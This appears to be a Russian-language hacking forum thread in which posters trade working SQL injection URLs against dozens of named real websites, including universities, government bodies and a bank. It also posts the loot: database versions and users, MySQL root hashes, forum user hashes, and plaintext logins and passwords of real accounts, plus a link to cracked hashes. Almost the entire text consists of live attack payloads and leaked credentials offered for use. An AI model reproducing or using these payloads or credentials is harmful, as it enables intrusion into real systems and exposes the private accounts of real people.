SQL Инъекции

Code:

http://www.galerialeme.com/exposicoes_textos.php?lang=ing&id=88&text_id=-1+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3/*

[email protected]:4.0.27-locaweb-log:galerialeme

Code:

http://www.christophkeller.com/films_view.php?text_id=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8,9,10,11,12/*&id=11

pierre_keller@localhost:4.1.22-standard-logierre_keller

Code:

http://www.christophkeller.com/films_view.php?text_id=-1+union+select+1,aes_decrypt(aes_encrypt(login,0x71),0x71),3,aes_decrypt(aes_encrypt(password,0x71),0x71),5,6,7,8,9,10,11,12+from+users/*&id=11

keller:helioflex pierre:cachou

Code:

http://www.nomen.com/index.php?language_id=2&menu_id=4&text_id=-1+union+select+concat(user(),0x3a,version(),0x3a,database())/*

root@localhost:4.0.26-nt:nomen

Code:

http://www.nomen.com/index.php?language_id=2&menu_id=4&text_id=-1+union+select+concat(user,0x3a,password)+from+mysql.user/*

root:1e30d6d6558d5312

Code:

http://www.ms-chat.com/magazine/article.show.php?text_id=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8,9/*

[email protected]:5.0.32-Debian_7etch1-log:doolao

Code:

http://www.ms-chat.com/magazine/article.show.php?text_id=-1+union+select+1,2,3,concat(username,0x3a,user_password,0x3a,user_email),5,6,7,8,9+from+phpbb_users/*

весомый вывод =) да и портал популярный

 

Code:

http://lawfirm.ru/news/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat(user(),0x3a,version(),0x3a,database()),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/*

root@pm9:4.0.24:lawf

Code:

http://lawfirm.ru/news/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat(user,0x3a,password),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+from+mysql.user+limit+0,1/*

root:17f62162237a6ce9

Code:

http://www.cultspace.org/viewHolyTextComments.php?text_id=-1+union+select+1,2,concat(user(),0x3a,version(),0x3a,database())/*

cultspac_root@localhost:4.1.22-standard-log:cultspac_production

Code:

http://www.escortenpriveontvangst.nl/index.php?open=list.php&sex_id=-1'/**/union/**/select/**/1,2,3,4,5,6,7,concat(user(),0x3a,version(),0x3a,database()),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55/*

escort@localhost:4.1.20-log:escort_escort

Code:

http://www.escortenpriveontvangst.nl/index.php?open=list.php&sex_id=-1'/**/union/**/select/**/1,2,3,4,5,6,7,concat(username,0x3a,user_password,0x3a,user_email),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55/**/from/**/phpbb_users/*

escortenpriveontvangst:5d1b83c5157b695ff205ab741e4a2609:[email protected]

Code:

http://www.nightnday.org/detail.php?list_id=-1+union+select+1,2,3,4,concat(user(),0x3a,version(),0x3a,database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19/*

atom_nightnday@localhost:5.0.22:nightnday

 

admin KAPACb

 

raum.ru

http://www.raum.ru/articles.php?id=-1'+union+select+1,2,3,4,5,concat(name,0x3a,password,0x3a,icq_number),7,8+from+vitz_forums.ibf_members/*

логин\хеш\уин используется базе, что и на vitz.ru , скулю к которому я выкладывал ранее.
http://rapidshare.com/files/62099632/hashes.rar.html - тут расшифровка хешей ( спасибо delay(0)'ю )

-------------------------------------------------------------

externat.kspu.ru

http://externat.kspu.ru/forum/thread.php?threadid=298&topicid=-1+union+select+concat(version(),0x2F,database(),0x2F,user())/*

4.0.24_Debian-10sarge2-log/externat/root@localhost


http://externat.kspu.ru/forum/thread.php?threadid=298&topicid=-1+union+select+concat(user_login,0x2F,user_password)+from+users+limit+0,1/*

логин\хеш

 

УкрТяжМет

форум почитателей тяжелой музыки


http://utm.in.ua/bands.php?mode=band&bid=-1319+union+select+1,concat_ws(0x3C62723E,username,user_icq,user_password,user_email),3,4,5,char(0x63,0x72,0x61,0x63,0x6b,0x65,0x64,0x20,0x62,0x79,0x20,0x66,0x6f,0x62,0x6f,0x66,0x6f,0x62,0x20,0xa9,0x20,0x28,0x41,0x6e,0x74,0x69,0x63,0x68,0x61,0x74,0x29),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+utm_users+limit+4814,1/*

 

Code:

http://www.marimedia.ru/news.php?news=-1+union+select+1,2,3,4,concat_ws(0x3a,converge_id,converge_pass_hash,converge_pass_salt,converge_email),6,7,8,9,10,11+from+marimediaru_forum.ibf_members_converge+limit+0,1
http://www.castledragmire.com/ragnarok/forums/forum.php?id=-1+union+select+1,2,concat_ws(0x203a20,name,password,icq,email),4,5,6,7,8,9,10+from+users/*

 

webdive.ru

http://www.webdive.ru/diveclub.php?a=1&id_town=-126+union+select+concat(version(),0x3a,database(),0x3a,user()),2/*

5.0.27:nas3ru_dive:[email protected]


http://www.webdive.ru/diveclub.php?a=1&id_town=-126+union+select+concat(name,0x2F,pass),2+from+fuser+limit+0,1/*

логин\пароль не хешированный ))

 

Code:

http://www.lvkrk.ee/index.php?task=galerii_teemad&list_id=9999999/**/union/**/select/**/1,2,3,concat(user(),0x3a,version(),0x3a,database()),5/*

root@localhost:4.0.20-log:kodu

Code:

http://www.lvkrk.ee/index.php?task=galerii_teemad&list_id=9999999/**/union/**/select/**/1,2,3,concat(user,0x3a,password),5+from+mysql.user/*

root:157cda3a54492a1e
phpgw:157cda3a54492a1e
admin:73a3bfe82d187e5b
phpgroupware:1a23abc3400d85c1

Code:

http://www.onlineitools.com/nl/nl-archive.php?bus_id=-1+union+select+aes_decrypt(aes_encrypt(version(),0x71),0x71)/*&list_id=1

4.1.9-standard-log

Code:

http://www.gtreview.com/events/event_detail.php?List_ID=-1+union+select+1,2,3,4,concat(user(),0x3a,version(),0x3a,database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*

exporta@localhost:4.1.20-log:dbExporta

Code:

http://202.205.109.23/new_wish/new_word.php?info_kind=2&list_id=-1+union+select+1,2,3,4,concat(user,0x3a,password)+from+mysql.user/*

root:0af0288503451485

Code:

http://www.librariacarter.ro/edituri.php?e_id=-1+union+select+concat(user(),0x3a,version(),0x3a,database()),2/*

libraria@localhost:4.1.20:libraria

Code:

http://www.agenda.unizh.ch/liste.php?list_type=reihe&list_id=-1+union+select+1,2,aes_decrypt(aes_encrypt(user(),0x71),0x71),4,5,6,aes_decrypt(aes_encrypt(database(),0x71),0x71),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,aes_decrypt(aes_encrypt(version(),0x71),0x71),36,37,38,39,40,41,42/*

[email protected] 5.0.18-Max ibis

Code:

http://www.mercatigenerali.org/eventi_detail.php?e_id=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8,9,10,11/*

[email protected]:4.0.27-standard-log:Sql68148_1

 

4job.ru

http://www.4job.ru/?pg_id=-1+union+select+concat(version(),0x2F,database(),0x2F,user())

4.1.22/job4/job4@localhost



http://www.4job.ru/?pg_id=-1+union+select+concat(login,0x2F,password)+from+users+limit+1,1

логин/пароль
admin/999000

-------------------------------------------------------------------

http://www.professia.ru/res_search.php?ID=-2+union+select+concat(version(),0x2F,database(),0x2F,user()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*

4.1.14-log/profess9_profess9/profess9_profess@localhost

 

rabotka.ru

http://www.rabotka.ru/index.php?empty=1&idl=-3+union+select+concat(version(),0x2F,database(),0x2F,user())

5.0.45/kikkas_job/kikkas@localhost


http://www.rabotka.ru/index.php?empty=1&idl=-3+union+select+concat(id,0x2F,name,0x2F,parol)+from+kikkas_job.webiusers+limit+0,1

ид\имя\пароль не хеш. в <title>

--------------------------------------------------------------

minerjob.ru

http://www.minerjob.ru/viewnew.php?id=-1+union+select+1,2,3,4,5,concat(version(),0x2F,database(),0x2F,user())/*

5.0.32-Debian_7etch1-log/jobnet_mine/[email protected]


http://www.minerjob.ru/viewnew.php?id=-1+union+select+1,2,3,4,5,concat(first_name,0x2F,email,0x2F,pwd)+from+users+limit+1,1/*

имя\мейл\пароль не хеш.

 

http://www.nhia.edu/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,aes_decrypt(aes_encrypt(concat(version(),0x33a,user()),1),1),22,33,44,55,66,77,1,1,1,1,1,1,1,1+from+news/*

http://www.hvcc.edu/news_events/newsstory.php?id=-1+union+select+1,host,password,user,5,6,7,8,9,11,12,13,14,15+from+mysql.user+limit+0,1/*

http://gopanthers.fit.edu/sports_info/view.php?id=-1+union+select+1,2,current_time(),version()/*

 

Code:

http://www.hostingdirectory.us/directory.php?ax=list&sub=1&cat_id=-1/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13/**

Code:

http://www.armagh.gov.uk/show_council_department.php?dis=whoswho&show_sub=7&department_id=-1+union+select+1,2,3,4,5,VERSION(),7,8,9,10/*

 

http://www.eng.wayne.edu/page.php?id=-1+union+select+1,aes_decrypt(aes_encrypt(concat(version(),0x33a,user(),0x3a,0x3a,id,0x3a,accessid),1),1),3,4,5,7+from+users/*

 

storage:*0F92CFEE8E9D2DAB2209AC88700985F6425EC4A1

carlo:47ffb440cc2afb7bba618a02bd25741e
[email protected]:47ffb440cc2afb7bba618a02bd25741e
adam:f5489f1da0df19ee7ec09eb721501c3e
wilson:05199deca16614131327f2c3fea9031c

admin:e73833d10128caa0ecde2964b0323522 hash md5()
admin:dinesh1
"дефнул" http://www.basketball.com.np/news.php?id=26
скрин http://fu2reteam.org/bastetball.gif

 

Code:

http://www.templatesfree.ru/templates.php?action=cards&id=-1+union+select+1,database()/*
http://www.templatesfree.ru/templates.php?action=cards&id=-1+union+select+1,user()/*
http://www.templatesfree.ru/templates.php?action=cards&id=-1+union+select+1,version()/*

 

Code:

http://www.tete.fi/regsystem/event.php?e_id=-1+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6,7,8,9,10,11/*

[email protected]:4.0.27-standard-log:tetefi

Code:

http://www.cablemaster.ru/SHOP/shp_warlist.php?action=list&b_id=-1+union+select+aes_decrypt(aes_encrypt(version(),0x71),0x71)/*

4.1.18-log root:*F50E7C5E4FEF168E91C3573602248FD8CA82571A

Code:

http://www.ohot-prostory.ru/show_b.php?b_id=-1+union+select+1,2,3,4,aes_decrypt(aes_encrypt(version(),0x71),0x71),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*&type=2

4.1.18-log

Code:

http://www.cjes.ru/actions/action.php?p_id=-1'/**/union/**/select/**/1,aes_decrypt(aes_encrypt(version(),0x71),0x71),3,4,5,6,7,8,9/*

4.1.18

Code:

http://afisha.newacropol.ru/showplace.php?p_id=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8,9,10,11,12/*

[email protected]:4.1.22-log:afisha

Code:

http://www.melan.gazinter.net/Forum/view.php?m_id=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6/*

melandb@localhost:4.1.22-log:melan

Code:

http://www.vesakday.net/vesak50/messages_details.php?m_id=-1+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6,7,8,9/*&trnslang=th

vesak50@localhost:5.1.17-beta-log:vesak50

Code:

http://cen.iatp.org.ua/virtual/job/boardua/view.php?m_id=-1+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4,5/*

[email protected]:4.1.22:cen

Code:

http://www.adm-km.gov.ua/forum/view.php?m_id=-1+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4,5/*

admkmgovua@localhost:4.0.27:admkmgovua

 

Банк "Объединенный Капитал"

Version: 4.1.20-lk-log
User: okbankru_site@localchost

 

ankil.ru

http://www.ankil.ru/ibs/ibs_program_tpl.php?program_id=-1'+union+select+1,concat(username,0x2F,password),3,4,5,6,7,8,9,10,11,12,13+from+dokeos_main.user+limit+0,1/*

логин\хеш

Еще есть таблица юзеров форума itaf_user в базе ita-forum, но запрос к ней выводит ошибку вероятно из-за тире в имени базы. Что с этим делать не знаю. Подскажите кто знает

 

С чего ты взял что из-за тире? Скорее всего прав нету для доступа к этой таблице.

 

Может и так, но на скуль

http://www.ankil.ru/ibs/ibs_program_tpl.php?program_id=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+from+ita-forum.itaf_user/*

ошибка

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-forum.itaf_user/*' AND p.program_active='on' AND p.program_teacher_id=t' at line 3


------------------------------------------------------------------